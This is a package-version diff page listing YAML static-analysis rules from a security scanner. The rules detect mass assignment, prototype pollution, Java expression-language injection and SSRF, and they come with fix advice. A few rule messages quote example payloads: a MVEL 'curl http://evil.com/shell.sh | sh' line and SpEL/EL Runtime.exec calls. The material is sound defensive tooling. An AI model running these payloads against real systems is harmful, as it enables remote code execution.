npm - @zhuma4/cli - Versions diffs - 4.0.0-alpha.1 → 4.3.0 - Mend

@zhuma4/cli 4.0.0-alpha.1 → 4.3.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (1128) hide show

package/rules/unified/cwe-915/zm-js-cwe915-mass-assignment.yaml ADDED Viewed

@@ -0,0 +1,112 @@
+# Source: common | Cluster: N/A
+# CWE-915: Node.js 过度绑定/批量赋值检测规则
+# 逐码 ZhuMa V4.1 Sprint 2 — JS/TS 规则库
+# 覆盖: Object.assign(req.body, target)、lodash.merge、Mongoose Model(req.body)、Sequelize bulkCreate
+rules:
+# ZM-JS-MA-001: Object.assign / lodash.merge 将 req.body 合并到数据库对象
+- id: zm-js-ma-001
+  severity: ERROR
+  message: |
+    Object.assign() 或 lodash.merge() 直接将 req.body / req.query / req.params
+    合并或赋值给数据库模型/内部对象，攻击者可注入额外字段(如 role: "admin"、isAdmin: true)
+    实现权限提升或数据篡改。
+    修复:
+    1. 只提取白名单字段: { username, email } = req.body; Object.assign(dbUser, { username, email })
+    2. 使用 pick() 辅助函数从 req.body 提取允许字段
+    3. 使用 Mongoose Schema 定义字段白名单
+    4. ORM层面设置 strict: 'throw' (Mongoose) 或 fields 白名单 (Sequelize)
+    5. 使用 joi / zod Schema 验证并 strip 未知字段
+  languages:
+    - javascript
+    - typescript
+  pattern-either:
+    - pattern: Object.assign($TARGET, $REQ.body, ...)
+    - pattern: Object.assign($TARGET, $REQ.query, ...)
+    - pattern: Object.assign($TARGET, $REQ.params, ...)
+    - pattern: lodash.merge($TARGET, $REQ.body, ...)
+    - pattern: lodash.merge($TARGET, $REQ.query, ...)
+    - pattern: lodash.merge($TARGET, $REQ.params, ...)
+    - pattern: _.merge($TARGET, $REQ.body, ...)
+    - pattern: _.merge($TARGET, $REQ.query, ...)
+    - pattern: _.merge($TARGET, $REQ.params, ...)
+    - pattern: _.assign($TARGET, $REQ.body, ...)
+    - pattern: _.assign($TARGET, $REQ.query, ...)
+    - pattern: _.assign($TARGET, $REQ.params, ...)
+    - pattern: _.defaults($TARGET, $REQ.body, ...)
+    - pattern: _.extend($TARGET, $REQ.body, ...)
+    - pattern: $merge($TARGET, $REQ.body, ...)
+  metadata:
+    cwe: "CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes"
+    owasp: "A01:2021 - Broken Access Control"
+    category: mass-assignment
+    precision: high
+    references:
+      - "https://cheatsheetseries.owasp.org/cheatsheets/Mass_Assignment_Cheat_Sheet.html"
+      - "https://mongoosejs.com/docs/guide.html#strict"
+# ZM-JS-MA-002: Mongoose/Sequelize 直接传入 req.body 创建/更新 (无字段过滤)
+- id: zm-js-ma-002
+  severity: ERROR
+  message: |
+    Mongoose Model 构造函数、create()、findByIdAndUpdate() 或 Sequelize Model.create()
+    直接传入 req.body / req.query 作为参数，未过滤允许字段，存在过度绑定风险。
+    攻击者可通过注入 protected 字段(如 role、credit、verified)绕过业务限制。
+    修复:
+    1. Mongoose: Schema 设置 { strict: true } 或 { strict: 'throw' }
+    2. Mongoose 查询: 先 destructure 白名单字段再传入
+    3. Sequelize: Model.create() 前使用 fields/attributes 白名单
+    4. 统一中间件层做字段过滤
+  languages:
+    - javascript
+    - typescript
+  pattern-either:
+    - pattern: $MODEL.create($REQ.body, ...)
+    - pattern: $MODEL.create($REQ.query, ...)
+    - pattern: new $MODEL($REQ.body, ...)
+    - pattern: new $MODEL($REQ.query, ...)
+    - pattern: $MODEL.insertMany($REQ.body, ...)
+    - pattern: $MODEL.findByIdAndUpdate($_, $REQ.body, ...)
+    - pattern: $MODEL.findOneAndUpdate($_, $REQ.body, ...)
+    - pattern: $MODEL.updateOne($_, $REQ.body, ...)
+    - pattern: $MODEL.updateMany($_, $REQ.body, ...)
+    - pattern: $MODEL.replaceOne($_, $REQ.body, ...)
+    - pattern: $MODEL.bulkWrite($REQ.body, ...)
+  metadata:
+    cwe: "CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes"
+    owasp: "A01:2021 - Broken Access Control"
+    category: mass-assignment
+    precision: high
+    references:
+      - "https://mongoosejs.com/docs/guide.html#strict"
+      - "https://sequelize.org/docs/v6/core-concepts/model-basics/#data-types"
+# ZM-JS-MA-003: Sequelize bulkCreate 无 fields 白名单
+- id: zm-js-ma-003
+  severity: WARNING
+  message: |
+    Sequelize Model.bulkCreate() 接收 req.body 且可能未设置 fields 白名单。
+    攻击者可批量注入额外字段，影响大量记录。
+    修复:
+    1. Model.bulkCreate(data, { fields: ['name', 'email'] }) 显式指定白名单
+    2. 在 Controller 层做字段提取: const { name, email } = req.body
+    3. 使用 Sequelize beforeBulkCreate hook 做字段验证
+  languages:
+    - javascript
+    - typescript
+  pattern-either:
+    - pattern: $MODEL.bulkCreate($REQ.body, ...)
+    - pattern: $MODEL.bulkCreate($REQ.query, ...)
+    - pattern: $MODEL.bulkBuild($REQ.body, ...)
+  metadata:
+    cwe: "CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes"
+    owasp: "A01:2021 - Broken Access Control"
+    category: mass-assignment
+    precision: medium
+    references:
+      - "https://sequelize.org/docs/v6/core-concepts/model-querying-basics/#bulkcreate"

package/rules/unified/cwe-915/zm-js-cwe915-prototype-pollution.yaml ADDED Viewed

@@ -0,0 +1,31 @@
+# Source: common | Cluster: N/A
+# CWE-915: Object.assign / 扩展运算符向 __proto__ / constructor.prototype 属性赋值
+# 逐码 ZhuMa V4.3 — JS/TS 原型污染规则库
+rules:
+- id: zm-js-protopollution-001
+  severity: ERROR
+  message: >
+    Object.assign 或 lodash merge 等合并操作中，目标包含 __proto__ 或
+    constructor.prototype 属性，可能导致原型污染(Prototype Pollution)攻击。
+    攻击者可通过控制合并源对象注入恶意属性到 Object.prototype。
+    修复: 使用 Object.create(null) 创建无原型对象，或过滤 __proto__/constructor 属性。
+  languages:
+    - javascript
+    - typescript
+  pattern-either:
+    - pattern: |
+        Object.assign($OBJ, {..., __proto__: $VAL, ...})
+    - pattern: |
+        Object.assign($OBJ, {..., constructor: {prototype: $VAL}, ...})
+    - pattern: |
+        $MERGE($OBJ, {..., __proto__: $VAL, ...})
+    - pattern: |
+        $MERGE($OBJ, {..., constructor: {prototype: $VAL}, ...})
+  metadata:
+    cwe: "CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes"
+    owasp: "A01:2021 - Broken Access Control"
+    category: security
+    precision: high
+    confidence: high

package/rules/unified/cwe-915/zm-php-cwe915-mass-assignment.yaml ADDED Viewed

@@ -0,0 +1,127 @@
+# Source: common | Cluster: N/A
+# CWE-915: PHP/Laravel 批量赋值检测
+# 逐码 ZhuMa V4.3 — PHP 通用规则库
+# 检测: Laravel $request->all() / Model::create($request->all()) 未限制字段
+rules:
+# ZM-PHP-MASS-001: Model::create($request->all()) 无字段白名单
+- id: zm-php-cwe915-mass-assignment-001
+  severity: ERROR
+  message: |
+    检测到 Laravel Eloquent Model::create() 使用 $request->all() 直接创建记录。
+    攻击者可通过添加额外字段（如 is_admin=1,role=admin）提升权限、
+    篡改敏感字段，导致越权访问。
+    修复方案:
+    1. 在 Model 中定义 $fillable 白名单:
+       protected $fillable = ['name', 'email', 'password'];
+    2. 或在 Model 中定义 $guarded 黑名单:
+       protected $guarded = ['id', 'is_admin', 'role'];
+    3. 在 Controller 中使用 $request->only() 或 $request->validated():
+       User::create($request->only(['name', 'email', 'password']));
+       User::create($request->validated());
+    4. 使用 Form Request 验证 + $request->validated()
+    5. 不要使用 $request->all() 直接创建/更新模型
+  languages:
+    - php
+  pattern-either:
+    - pattern: $MODEL::create($request->all())
+    - pattern: $MODEL->create($request->all())
+    - pattern: $MODEL::create(request()->all())
+    - pattern: $MODEL->create(request()->all())
+    - pattern: $MODEL::create(Request::all())
+    - pattern: $MODEL->create(Request::all())
+  metadata:
+    cwe: "CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes"
+    severity: ERROR
+    precision: high
+    category: mass-assignment
+    likelihood: MEDIUM
+    impact: CRITICAL
+    owasp: "A01:2021 - Broken Access Control"
+    references:
+      - "https://laravel.com/docs/eloquent#mass-assignment"
+      - "https://owasp.org/www-community/attacks/Mass_Assignment"
+# ZM-PHP-MASS-002: Model::update($request->all()) 无字段限制
+- id: zm-php-cwe915-mass-assignment-002
+  severity: ERROR
+  message: |
+    检测到 Laravel Eloquent 的 update() 方法使用 $request->all()。
+    与 create() 同样，update() 使用 $request->all() 存在批量赋值风险，
+    攻击者可篡改敏感字段。
+    修复方案:
+    1. $user->update($request->only(['name', 'email']));
+    2. $user->update($request->validated());
+    3. 在 Model 中设置 $guarded 或 $fillable
+  languages:
+    - php
+  pattern-either:
+    - pattern: $MODEL->update($request->all())
+    - pattern: $MODEL::where(...)->update($request->all())
+    - pattern: $MODEL->find(...)->update($request->all())
+    - pattern: $MODEL->update(request()->all())
+  metadata:
+    cwe: "CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes"
+    severity: ERROR
+    precision: high
+    category: mass-assignment
+    likelihood: MEDIUM
+    impact: CRITICAL
+    owasp: "A01:2021 - Broken Access Control"
+# ZM-PHP-MASS-003: Model::firstOrCreate/updateOrCreate 使用 $request->all()
+- id: zm-php-cwe915-mass-assignment-003
+  severity: ERROR
+  message: |
+    检测到 Laravel firstOrCreate() / updateOrCreate() 使用 $request->all()。
+    这些方法同样受批量赋值漏洞影响。
+    修复方案:
+    1. 使用 $request->only(['name','email']) 替代 $request->all()
+    2. 设置 Model $fillable/$guarded
+    3. 使用 Form Request 验证 + $request->validated()
+  languages:
+    - php
+  pattern-either:
+    - pattern: $MODEL::firstOrCreate($request->all())
+    - pattern: $MODEL->firstOrCreate($request->all())
+    - pattern: $MODEL::updateOrCreate([...], $request->all())
+    - pattern: $MODEL->updateOrCreate([...], $request->all())
+  metadata:
+    cwe: "CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes"
+    severity: ERROR
+    precision: high
+    category: mass-assignment
+    likelihood: MEDIUM
+    impact: CRITICAL
+    owasp: "A01:2021 - Broken Access Control"
+# ZM-PHP-MASS-004: Model::fill($request->all())  + save()
+- id: zm-php-cwe915-mass-assignment-004
+  severity: ERROR
+  message: |
+    检测到 Laravel Model->fill($request->all())->save() 模式。
+    fill() 配合 $request->all() 同样按 $fillable/$guarded 批量赋值，
+    但如果 Model 未正确配置保护字段，存在风险。
+    修复方案:
+    1. 使用 $request->only(['列出的字段']) 明确指定允许的字段
+    2. 或 $request->safe()->all() (Laravel 8+)
+    3. 确保所有 Model 定义了 $fillable 或 $guarded
+  languages:
+    - php
+  pattern-either:
+    - pattern: $MODEL->fill($request->all())->save()
+    - pattern: $MODEL->fill(request()->all())->save()
+    - pattern: $MODEL->forceFill($request->all())->save()
+  metadata:
+    cwe: "CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes"
+    severity: WARNING
+    precision: high
+    category: mass-assignment
+    likelihood: MEDIUM
+    impact: CRITICAL
+    owasp: "A01:2021 - Broken Access Control"

package/rules/unified/cwe-915/zm-taint-915-915-javascript-216.yaml ADDED Viewed

@@ -0,0 +1,39 @@
+# Source: taint | Cluster: CL-915-JAVASCRIPT-216
+# Taint-upgraded rule: CWE-915 - Object.assign mass assignment
+# Cluster: CL-915-JAVASCRIPT-216
+rules:
+- id: zhuma-taint-915-915-javascript-216
+  mode: taint
+  metadata:
+    category: CWE-915
+    cwe: "CWE-915"
+    confidence: MEDIUM
+    source: nvd+taint-extension
+    cluster: CL-915-JAVASCRIPT-216
+  message: |
+    检测到批量赋值风险。用户输入数据直接通过Object.assign合并到目标对象，可能导致属性覆盖。
+  severity: WARNING
+  languages:
+    - javascript
+    - typescript
+  paths:
+    exclude:
+      - "**/test/**"
+      - "**/tests/**"
+      - "**/vendor/**"
+      - "**/node_modules/**"
+  pattern-sources:
+  - patterns:
+    - pattern-either:
+      - pattern: req.query.$X
+      - pattern: req.body.$X
+      - pattern: req.params.$X
+  pattern-sinks:
+  - patterns:
+    - pattern-either:
+      - pattern: Object.assign($TARGET, ...)
+      - pattern: Object.assign($TARGET, $SOURCE)

package/rules/unified/cwe-915/zm-taint-915-915-javascript-217.yaml ADDED Viewed

@@ -0,0 +1,40 @@
+# Source: taint | Cluster: CL-915-JAVASCRIPT-217
+# Taint-upgraded rule: CWE-915 - lodash merge/deepExtend
+# Cluster: CL-915-JAVASCRIPT-217
+rules:
+- id: zhuma-taint-915-915-javascript-217
+  mode: taint
+  metadata:
+    category: CWE-915
+    cwe: "CWE-915"
+    confidence: MEDIUM
+    source: nvd+taint-extension
+    cluster: CL-915-JAVASCRIPT-217
+  message: |
+    检测到批量赋值风险。使用lodash的_.merge/deepExtend合并用户输入对象，可能导致属性污染。
+  severity: WARNING
+  languages:
+    - javascript
+    - typescript
+  paths:
+    exclude:
+      - "**/test/**"
+      - "**/tests/**"
+      - "**/vendor/**"
+      - "**/node_modules/**"
+  pattern-sources:
+  - patterns:
+    - pattern-either:
+      - pattern: req.query.$X
+      - pattern: req.body.$X
+      - pattern: req.params.$X
+  pattern-sinks:
+  - patterns:
+    - pattern-either:
+      - pattern: _.merge($TARGET, ...)
+      - pattern: _.defaultsDeep($TARGET, ...)
+      - pattern: _.extend($TARGET, ...)

package/rules/unified/cwe-915/zm-taint-915-915-javascript-218.yaml ADDED Viewed

@@ -0,0 +1,39 @@
+# Source: taint | Cluster: CL-915-JAVASCRIPT-218
+# Taint-upgraded rule: CWE-915 - JSON.parse + Object.assign
+# Cluster: CL-915-JAVASCRIPT-218
+rules:
+- id: zhuma-taint-915-915-javascript-218
+  mode: taint
+  metadata:
+    category: CWE-915
+    cwe: "CWE-915"
+    confidence: MEDIUM
+    source: nvd+taint-extension
+    cluster: CL-915-JAVASCRIPT-218
+  message: |
+    检测到批量赋值风险。将用户输入的JSON解析结果直接赋值到对象，可能导致意外属性覆盖。
+  severity: WARNING
+  languages:
+    - javascript
+    - typescript
+  paths:
+    exclude:
+      - "**/test/**"
+      - "**/tests/**"
+      - "**/vendor/**"
+      - "**/node_modules/**"
+  pattern-sources:
+  - patterns:
+    - pattern-either:
+      - pattern: req.query.$X
+      - pattern: req.body.$X
+      - pattern: req.params.$X
+  pattern-sinks:
+  - patterns:
+    - pattern-either:
+      - pattern: Object.assign($TARGET, JSON.parse(...))
+      - pattern: Object.assign($TARGET, $PARSED)

package/rules/unified/cwe-915/zm-taint-915-915-javascript-219.yaml ADDED Viewed

@@ -0,0 +1,42 @@
+# Source: taint | Cluster: CL-915-JAVASCRIPT-219
+# Taint-upgraded rule: CWE-915 - proto pollution
+# Cluster: CL-915-JAVASCRIPT-219
+rules:
+- id: zhuma-taint-915-915-javascript-219
+  mode: taint
+  metadata:
+    category: CWE-915
+    cwe: "CWE-915"
+    confidence: MEDIUM
+    source: nvd+taint-extension
+    cluster: CL-915-JAVASCRIPT-219
+  message: |
+    检测到原型链污染风险。用户输入数据被用于修改对象的__proto__或constructor.prototype属性。
+  severity: WARNING
+  languages:
+    - javascript
+    - typescript
+  paths:
+    exclude:
+      - "**/test/**"
+      - "**/tests/**"
+      - "**/vendor/**"
+      - "**/node_modules/**"
+  pattern-sources:
+  - patterns:
+    - pattern-either:
+      - pattern: req.query.$X
+      - pattern: req.body.$X
+      - pattern: req.params.$X
+  pattern-sinks:
+  - patterns:
+    - pattern-either:
+      - pattern: $OBJ['__proto__']
+      - pattern: $OBJ["__proto__"]
+      - pattern: $OBJ.__proto__
+      - pattern: $OBJ.constructor.prototype
+      - pattern: $OBJ['constructor']['prototype']

package/rules/unified/cwe-917/zm-java-cwe917-expression-injection.yaml ADDED Viewed

@@ -0,0 +1,121 @@
+# Source: common | Cluster: N/A
+# CWE-917: Java OGNL/MVEL/EL 表达式注入深度检测
+# 逐码 ZhuMa V4.1 Sprint — Java 规则库
+# 覆盖: ExpressionEvaluator + userInput / MVEL 全量sink
+rules:
+# ZM-JAVA-EXPR-001: MVEL 表达式注入
+- id: zm-java-expr-001
+  severity: ERROR
+  message: |
+    MVEL.eval() / MVEL.executeExpression() 的参数由用户输入控制，可导致任意代码执行。
+    MVEL 表达式支持方法调用、new 操作符、反射等高级特性，是完整的表达式语言。
+    攻击Payload示例:
+    Runtime.getRuntime().exec("curl http://evil.com/shell.sh | sh")
+    或通过反射: java.lang.Runtime.getRuntime().exec(...)
+    修复:
+    1. 禁止用户输入直接传入MVEL执行
+    2. 如必须动态表达式，使用严格白名单的变量+简单表达式语法
+    3. 使用 MVEL 沙箱: ParserContext + 禁用 imports
+    4. 替换为安全的模板引擎(如 Mustache)
+  languages:
+    - java
+  pattern-either:
+    - pattern: MVEL.eval($INPUT, ...)
+    - pattern: MVEL.eval($INPUT)
+    - pattern: MVEL.executeExpression($INPUT, ...)
+    - pattern: MVEL.executeExpression($EXPR, $INPUT)
+    - pattern: MVEL.compileExpression($INPUT, ...)
+    - pattern: MVEL.executeSetExpression($INPUT, ...)
+  metadata:
+    cwe: "CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement (Expression Language Injection)"
+    severity: ERROR
+    precision: high
+    category: expression-injection
+    likelihood: HIGH
+    impact: CRITICAL
+    owasp: "A03:2021 - Injection"
+    references:
+      - "https://mvel.documentnode.com/"
+      - "https://portswigger.net/web-security/server-side-template-injection"
+# ZM-JAVA-EXPR-002: javax.el / Jakarta EL 表达式注入
+- id: zm-java-expr-002
+  severity: ERROR
+  message: |
+    检测到 javax.el.ExpressionFactory / jakarta.el.ExpressionFactory 创建表达式时
+    表达式字符串由用户输入控制，可导致EL表达式注入。
+    EL表达式支持方法调用:
+    #{bean.getClass().forName('java.lang.Runtime').getRuntime().exec('cmd')}
+    修复:
+    1. 禁止用户输入直接作为EL表达式
+    2. 使用 ELProcessor.setVariable 设置只读变量
+    3. 使用 StandardELContext + 禁用的 ELResolver
+    4. 对用户输入进行严格的白名单校验(仅允许简单属性访问)
+  languages:
+    - java
+  pattern-either:
+    - pattern: |
+        $FACTORY.createValueExpression($CONTEXT, $INPUT, $CLASS)
+    - pattern: |
+        $FACTORY.createMethodExpression($CONTEXT, $INPUT, $RTYPE, $PARAMS)
+    - pattern: |
+        $PROCESSOR.eval($INPUT)
+    - pattern: |
+        $PROCESSOR.getValue($INPUT, $CLASS)
+    - pattern: |
+        $ENGINE.eval($INPUT)
+  metadata:
+    cwe: "CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement (Expression Language Injection)"
+    severity: ERROR
+    precision: high
+    category: expression-injection
+    likelihood: HIGH
+    impact: CRITICAL
+    owasp: "A03:2021 - Injection"
+    references:
+      - "https://docs.oracle.com/javaee/7/tutorial/jsf-el.htm"
+# ZM-JAVA-EXPR-003: Spring ExpressionEvaluator 用户输入评估
+- id: zm-java-expr-003
+  severity: ERROR
+  message: |
+    检测到 Spring ExpressionParser.parseExpression() 的表达式由用户输入直接构造，
+    或 Expression.getValue() 在不可信上下文中执行。
+    SpEL payload 示例:
+    T(java.lang.Runtime).getRuntime().exec('calc')
+    #{T(java.lang.Runtime).getRuntime().exec('cmd')}
+    new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec('id').getInputStream()).useDelimiter('\\A').next()
+    修复:
+    1. 使用 SimpleEvaluationContext 替代 StandardEvaluationContext
+    2. SimpleEvaluationContext 默认禁用类型引用(T操作符)、构造器调用、方法引用
+    3. 使用 ExpressionParser 的 setVariable 方法而非拼接表达式字符串
+    4. 对用户输入做严格白名单过滤
+  languages:
+    - java
+  pattern-either:
+    - pattern: |
+        $PARSER.parseExpression($INPUT)
+    - pattern: |
+        $PARSER.parseExpression($INPUT + $Y)
+    - pattern: |
+        $EXP.getValue($CONTEXT)
+    - pattern: |
+        $EXP.getValue()
+  metadata:
+    cwe: "CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement (Expression Language Injection)"
+    severity: ERROR
+    precision: medium
+    category: expression-injection
+    likelihood: HIGH
+    impact: CRITICAL
+    owasp: "A03:2021 - Injection"
+    references:
+      - "https://docs.spring.io/spring-framework/docs/current/reference/html/core.html#expressions"

package/rules/unified/cwe-918/cwe-918-ssrf.yaml ADDED Viewed

@@ -0,0 +1,46 @@
+# Source: common | Cluster: N/A
+# CWE-918: 服务端请求伪造 (SSRF) 检测规则
+# 逐码 ZhuMa V4.0 Alpha — 通用规则库
+rules:
+# ZM-JAVA-SSRF-001: HttpURLConnection URL 用户可控
+- id: zm-java-ssrf-001
+  severity: HIGH
+  message: |
+    检测到 HttpURLConnection 打开的 URL 可能包含用户输入。
+    攻击者可能利用 SSRF 访问内网资源 (如 http://169.254.169.254/)。
+    应对 URL 进行白名单校验，禁止访问内网/本地地址。
+  languages:
+    - java
+  pattern-either:
+    - pattern: |
+        (HttpURLConnection) new URL($URL).openConnection();
+    - pattern: |
+        HttpURLConnection $CONN = (HttpURLConnection) new URL($URL).openConnection();
+    - pattern: |
+        new URL($URL).openConnection();
+  metadata:
+    cwe: "CWE-918: Server-Side Request Forgery (SSRF)"
+    owasp: "A10:2021 - Server-Side Request Forgery (SSRF)"
+    precision: medium
+# ZM-JAVA-SSRF-002: RestTemplate URL 用户可控
+- id: zm-java-ssrf-002
+  severity: MEDIUM
+  message: |
+    检测到 RestTemplate 请求的 URL 可能由用户输入构造。
+    应校验目标 URL 域名白名单，拒绝内网地址。
+  languages:
+    - java
+  pattern-either:
+    - pattern: |
+        $RT.getForObject($URL, ...);
+    - pattern: |
+        $RT.postForObject($URL, ...);
+    - pattern: |
+        $RT.exchange($URL, ...);
+  metadata:
+    cwe: "CWE-918: Server-Side Request Forgery (SSRF)"
+    owasp: "A10:2021 - Server-Side Request Forgery (SSRF)"
+    precision: low